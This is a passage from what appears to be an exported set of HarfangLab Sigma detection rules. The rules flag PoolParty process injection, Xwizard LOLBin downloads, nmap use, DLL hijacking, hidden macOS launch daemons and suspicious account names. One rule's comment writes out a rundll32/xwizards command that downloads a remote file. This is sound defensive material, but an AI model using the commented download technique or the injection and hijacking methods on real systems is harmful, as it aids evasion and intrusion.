"content": "title: Possible Process Injection Using PoolParty\nid: 9994e158-8140-4487-9d9d-7fd096b4b4bb\ndescription: |\n Detects an attempt to open a process with specific permissions required by the Pool Party injection methods.\n These specific permissions allow an attacker to perform code injection using the Pool Party techniques, exploiting the Windows user-mode thread pool.\n Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.\n It is recommended to investigate both the accessing and targeted processes activities.\nreferences:\n - https://thehackernews.com/2023/12/new-poolparty-process-injection.html\n - https://attack.mitre.org/techniques/T1055/\ndate: 2023/12/12\nmodified: 2025/11/13\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n # PROCESS_QUERY_LIMITED_INFORMATION|PROCESS_QUERY_INFORMATION|PROCESS_DUP_HANDLE|PROCESS_VM_WRITE|PROCESS_VM_READ|PROCESS_VM_OPERATION\n GrantedAccess: '0x1478'\n ProcessImage|contains: '\\'\n\n exclusion_lsass:\n ProcessImage:\n - '?:\\Windows\\System32\\lsass.exe'\n - '\\Device\\VhdHardDisk{????????-????-????-????-????????????}\\Windows\\System32\\lsass.exe'\n - '\\Device\\HarddiskVolume*\\Windows\\System32\\lsass.exe'\n\n exclusion_svchost:\n ProcessImage: '?:\\Windows\\System32\\svchost.exe'\n\n exclusion_windows_store:\n ProcessImage|endswith:\n - '\\MpSigStub.exe'\n - '\\AM_Base.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n exclusion_mcafee:\n ProcessSigned: 'true'\n ProcessSignature:\n - 'McAfee, Inc.'\n - 'McAfee, LLC'\n - 'MUSARUBRA US LLC' # new signer name for mcafee/trellix it seems\n\n 
exclusion_eset:\n ProcessImage:\n - '?:\\Program Files\\ESET\\ESET File Security\\ekrn.exe'\n - '?:\\Program Files\\ESET2\\ESET File Security\\ekrn.exe'\n - '?:\\Program Files\\ESET\\ESET Security\\ekrn.exe'\n - '?:\\Program Files\\ESET2\\ESET Security\\ekrn.exe'\n - '?:\\Program Files\\ESET\\ESET Endpoint Security\\ekrn.exe'\n - '?:\\Program Files\\ESET2\\ESET Endpoint Security\\ekrn.exe'\n - '?:\\Program Files\\ESET\\ESET Endpoint Antivirus\\ekrn.exe'\n - '?:\\Program Files\\ESET2\\ESET Endpoint Antivirus\\ekrn.exe'\n\n exclusion_eset_signature:\n ProcessImage|endswith: '\\ekrn.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'ESET, spol. s r.o.'\n\n exclusion_panda:\n ProcessImage|endswith: '\\PSANHost.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Panda Security S.L.'\n - 'Panda Security, S.L.'\n\n exclusion_adobearm:\n ProcessImage|endswith: '\\AdobeARM.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Adobe Inc.'\n\n exclusion_defender:\n # AntiMalware Definition Update\n ProcessOriginalFileName: 'NIS_Full.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9994e158-8140-4487-9d9d-7fd096b4b4bb",
"rule_name": "Possible Process Injection Using PoolParty",
"rule_description": "Detects an attempt to open a process with the specific permissions required by the Pool Party injection methods.\nThese specific permissions allow an attacker to perform code injection using the Pool Party techniques, exploiting the Windows user-mode thread pool.\nAdversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.\nIt is recommended to investigate the activities of both the accessing process and the targeted process.\n",
"rule_creation_date": "2023-12-12",
"rule_modified_date": "2025-11-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "99afba1b-3560-4a5a-8e16-3a4e64477931",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628159Z",
"creation_date": "2026-03-23T11:45:34.628161Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628165Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Xwizard/",
"https://x.com/0gtweet/status/1842252508841832864",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1105_xwizard_lolbas_download.yml",
"content": "title: File Downloaded via Xwizard\nid: 99afba1b-3560-4a5a-8e16-3a4e64477931\ndescription: |\n Detects a suspicious execution of Xwizard executable or DLL to download a file.\n The downloaded file is saved in one of these locations:\n - %LocalAppData%\\Microsoft\\Windows\\INetCache\\<8_RANDOM_ALNUM_CHARS>\\[1].\n - %LocalAppData%\\Microsoft\\Windows\\INetCache\\IE\\<8_RANDOM_ALNUM_CHARS>\\[1].\n Adversaries may transfer tools or other files to a compromised environment using legitimate tool to evade detection.\n It is recommended to check the content of the downloaded file and for other suspicious behavior by the parents of the current process.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/\n - https://x.com/0gtweet/status/1842252508841832864\n - https://attack.mitre.org/techniques/T1105/\ndate: 2022/11/18\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Xwizard\n - classification.Windows.Behavior.FileDownload\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_exe_image:\n Image|endswith: '\\xwizard.exe'\n # Renamed binaries\n OriginalFileName: 'xwizard.exe'\n\n selection_exe_cmdline:\n CommandLine|contains|all:\n - ' RunWizard '\n - ' {7940acf8-60ba-4213-a7c3-f3b400ee266d}'\n - 'http'\n\n selection_dll_image:\n - ProcessImage|endswith: '\\rundll32.exe'\n - ProcessOriginalFileName: 'RUNDLL32.EXE'\n\n selection_dll_commandline:\n # rundll32.exe xwizards,RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://secure.eicar.org/eicar.com.txt\n CommandLine|contains|all:\n - xwizards\n - '7940acf8-60ba-4213-a7c3-f3b400ee266d'\n\n exclusion_known_fp:\n ParentImage:\n - '?:\\Windows\\System32\\sihost.exe'\n - '?:\\Windows\\explorer.exe'\n\n - '?:\\Windows\\System32\\RuntimeBroker.exe'\n CommandLine: 
'?:\\WINDOWS\\system32\\xwizard.exe RunWizard {7940ACF8-60BA-4213-A7C3-F3B400EE266D}'\n\n condition: (all of selection_exe_* or all of selection_dll_*) and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "99afba1b-3560-4a5a-8e16-3a4e64477931",
"rule_name": "File Downloaded via Xwizard",
"rule_description": "Detects a suspicious execution of the Xwizard executable or DLL to download a file.\nThe downloaded file is saved in one of these locations:\n - %LocalAppData%\\Microsoft\\Windows\\INetCache\\<8_RANDOM_ALNUM_CHARS>\\[1].\n - %LocalAppData%\\Microsoft\\Windows\\INetCache\\IE\\<8_RANDOM_ALNUM_CHARS>\\[1].\nAdversaries may transfer tools or other files to a compromised environment using a legitimate tool to evade detection.\nIt is recommended to check the content of the downloaded file and to look for other suspicious behavior by the parents of the current process.\n",
"rule_creation_date": "2022-11-18",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "99bab1be-2133-4c80-99ca-4fc45bb8d6d5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604032Z",
"creation_date": "2026-03-23T11:45:34.604035Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604043Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1046/",
"https://attack.mitre.org/techniques/T1049/"
],
"name": "t1046_nmap.yml",
"content": "title: Nmap Execution (Windows)\nid: 99bab1be-2133-4c80-99ca-4fc45bb8d6d5\ndescription: |\n Detects the execution of nmap.\n Nmap is a tool often used by attackers to map networks, services or open ports.\n It is recommended to check if the usage of nmap is legitimate as well as to investigate other suspicious activities in the same user session.\nreferences:\n - https://attack.mitre.org/techniques/T1046/\n - https://attack.mitre.org/techniques/T1049/\ndate: 2021/06/29\nmodified: 2025/10/23\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1046\n - attack.t1049\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Nmap\n - classification.Windows.Behavior.NetworkScan\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\nmap.exe'\n - OriginalFileName: 'Nmap'\n - InternalName: 'Nmap'\n\n exclusion_embedded:\n Image:\n - '?:\\Program Files\\\\*\\nmap\\nmap.exe'\n - '?:\\Program Files (x86)\\\\*\\nmap\\nmap.exe'\n - '?:\\F-Secure\\RadarScanAgent\\\\*\\nmap\\nmap.exe'\n - '?:\\ManageEngine\\OpManager\\nmap\\nmap.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "99bab1be-2133-4c80-99ca-4fc45bb8d6d5",
"rule_name": "Nmap Execution (Windows)",
"rule_description": "Detects the execution of nmap.\nNmap is a tool often used by attackers to map networks, services or open ports.\nIt is recommended to check if the usage of nmap is legitimate as well as to investigate other suspicious activities in the same user session.\n",
"rule_creation_date": "2021-06-29",
"rule_modified_date": "2025-10-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1046",
"attack.t1049"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "99d463a5-30eb-4faf-8a56-3f7379ca3b5f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601476Z",
"creation_date": "2026-03-23T11:45:34.601479Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601487Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_storrept.yml",
"content": "title: DLL Hijacking via storrept.exe\nid: 99d463a5-30eb-4faf-8a56-3f7379ca3b5f\ndescription: |\n Detects potential Windows DLL Hijacking via storrept.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'storrept.exe'\n ImageLoaded|endswith:\n - '\\atl.dll'\n - '\\mfc42u.dll'\n - '\\srmtrace.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "99d463a5-30eb-4faf-8a56-3f7379ca3b5f",
"rule_name": "DLL Hijacking via storrept.exe",
"rule_description": "Detects potential Windows DLL Hijacking via storrept.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9a186fde-3db0-40f6-a3c1-0b40019ebb63",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617409Z",
"creation_date": "2026-03-23T11:45:34.617411Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617415Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/004/",
"https://attack.mitre.org/techniques/T1564/001/"
],
"name": "t1543_004_launch_daemons_hidden.yml",
"content": "title: Hidden Launch Daemon Created\nid: 9a186fde-3db0-40f6-a3c1-0b40019ebb63\ndescription: |\n Detects the creation of an hidden launch daemon file.\n Adversaries may create hidden files in order to avoid detection from users.\n It is recommended to check the process creating the file for other suspicious behaviors and that the content of the newly created file is legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1543/004/\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2024/04/30\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1543.004\n - attack.t1543.001\n - attack.defense_evasion\n - attack.t1564.001\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_path:\n - Path|startswith:\n - '/System/Library/LaunchDaemons/'\n - '/Library/LaunchDaemons/'\n - TargetPath|startswith:\n - '/System/Library/LaunchDaemons/'\n - '/Library/LaunchDaemons/'\n selection_kind:\n Kind:\n - 'create' # Currently handled by file_event\n - 'rename'\n ProcessImage|contains: '?'\n\n selection_hidden:\n - Path|re: '.*/\\.[^/]*$'\n - TargetPath|re: '.*/\\.[^/]*$'\n\n filter_nosync: # SIP related file\n - Path|endswith: '/.dat.nosync*.??????'\n - TargetPath|endswith: '/.dat.nosync*.??????'\n\n exclusion_common:\n Image:\n - '/usr/bin/rsync'\n - '/usr/bin/sed'\n\n exclusion_temp_file:\n - Image: '/usr/bin/vim'\n Path|endswith: '.swp'\n - Image: '/usr/bin/ditto'\n Path|endswith: '/.BC.T_*'\n - Image: '/usr/bin/ditto'\n TargetPath|endswith: '/.BC.T_*'\n\n exclusion_bomgar:\n - Path:\n - '/Library/LaunchDaemons/.com.bomgar.bomgar-ps-*.helper/run.state'\n - '/Library/LaunchDaemons/.com.bomgar.bomgar-ps-*.helper'\n - ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.bomgar.bomgar-scc'\n\n exclusion_sandbox:\n ProcessParentCommandLine|startswith: '/bin/sh 
/tmp/PKInstallSandbox.??????/Scripts/'\n\n exclusion_jamf:\n ProcessImage: '/usr/local/jamf/bin/jamf'\n\n exclusion_finder:\n Image: '/System/Library/CoreServices/Finder.app/Contents/MacOS/Finder'\n Path|endswith: '.DS_Store'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9a186fde-3db0-40f6-a3c1-0b40019ebb63",
"rule_name": "Hidden Launch Daemon Created",
"rule_description": "Detects the creation of a hidden launch daemon file.\nAdversaries may create hidden files in order to avoid detection by users.\nIt is recommended to check the process that created the file for other suspicious behaviors and to verify that the content of the newly created file is legitimate.\n",
"rule_creation_date": "2024-04-30",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1543.001",
"attack.t1543.004",
"attack.t1564.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9a250773-45c0-4cf1-860c-4e937e831b2d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077033Z",
"creation_date": "2026-03-23T11:45:34.077035Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077040Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/malmoeb/status/1569441172061585409",
"https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/",
"https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/2022OverWatchThreatHuntingReport.pdf",
"https://assets.sentinelone.com/sentinellabs22/SentinelLabs-BlackBasta",
"https://mp.weixin.qq.com/s/pd6fUs5TLdBtwUHauclDOQ",
"https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/",
"https://attack.mitre.org/techniques/T1078",
"https://attack.mitre.org/techniques/T1098"
],
"name": "t1078_suspicious_user_creation.yml",
"content": "title: Suspicious User Created\nid: 9a250773-45c0-4cf1-860c-4e937e831b2d\ndescription: |\n Detects the creation of user accounts with names that match known patterns or usernames commonly associated with malicious activity.\n The detection focuses on usernames that have been previously identified as suspicious or associated with attacker tradecraft.\n It is recommended to investigate the creation of these accounts, review the permissions and access rights of the new accounts, and remove any unnecessary or unauthorized user accounts.\n Additionally, monitor for repeated attempts to create similar accounts or suspicious patterns of access across the environment.\nreferences:\n - https://twitter.com/malmoeb/status/1569441172061585409\n - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/\n - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1\n - https://go.crowdstrike.com/rs/281-OBQ-266/images/2022OverWatchThreatHuntingReport.pdf\n - https://assets.sentinelone.com/sentinellabs22/SentinelLabs-BlackBasta\n - https://mp.weixin.qq.com/s/pd6fUs5TLdBtwUHauclDOQ\n - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\n - https://attack.mitre.org/techniques/T1078\n - https://attack.mitre.org/techniques/T1098\ndate: 2022/10/06\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1078\n - attack.t1098\n - attack.initial_access\n - attack.t1078.002\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n Source: 'Microsoft-Windows-Security-Auditing'\n EventID: 4720\n TargetUserName:\n - 'z'\n - 'zz'\n - 'Mysql'\n - 'DefaultAccount?'\n - 'admina'\n - 
'Crackenn'\n - 'krtbgt'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9a250773-45c0-4cf1-860c-4e937e831b2d",
"rule_name": "Suspicious User Created",
"rule_description": "Detects the creation of user accounts with names that match known patterns or usernames commonly associated with malicious activity.\nThe detection focuses on usernames that have been previously identified as suspicious or associated with attacker tradecraft.\nIt is recommended to investigate the creation of these accounts, review the permissions and access rights of the new accounts, and remove any unnecessary or unauthorized user accounts.\nAdditionally, monitor for repeated attempts to create similar accounts or suspicious patterns of access across the environment.\n",
"rule_creation_date": "2022-10-06",
"rule_modified_date": "2025-02-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1078",
"attack.t1078.002",
"attack.t1098"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9a5109e3-c824-43d7-93a4-914d1f268ff8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587947Z",
"creation_date": "2026-03-23T11:45:34.587950Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587968Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msiexec.yml",
"content": "title: DLL Hijacking via msiexec.exe\nid: 9a5109e3-c824-43d7-93a4-914d1f268ff8\ndescription: |\n Detects potential Windows DLL Hijacking via msiexec.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msiexec.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\msi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9a5109e3-c824-43d7-93a4-914d1f268ff8",
"rule_name": "DLL Hijacking via msiexec.exe",
"rule_description": "Detects potential Windows DLL Hijacking via msiexec.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9a663634-e603-4974-bddd-b20163a84296",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074122Z",
"creation_date": "2026-03-23T11:45:34.074124Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074128Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/bytecode77/slui-file-handler-hijack-privilege-escalation"
],
"name": "t1548_002_prepare_uac_bypass_slui.yml",
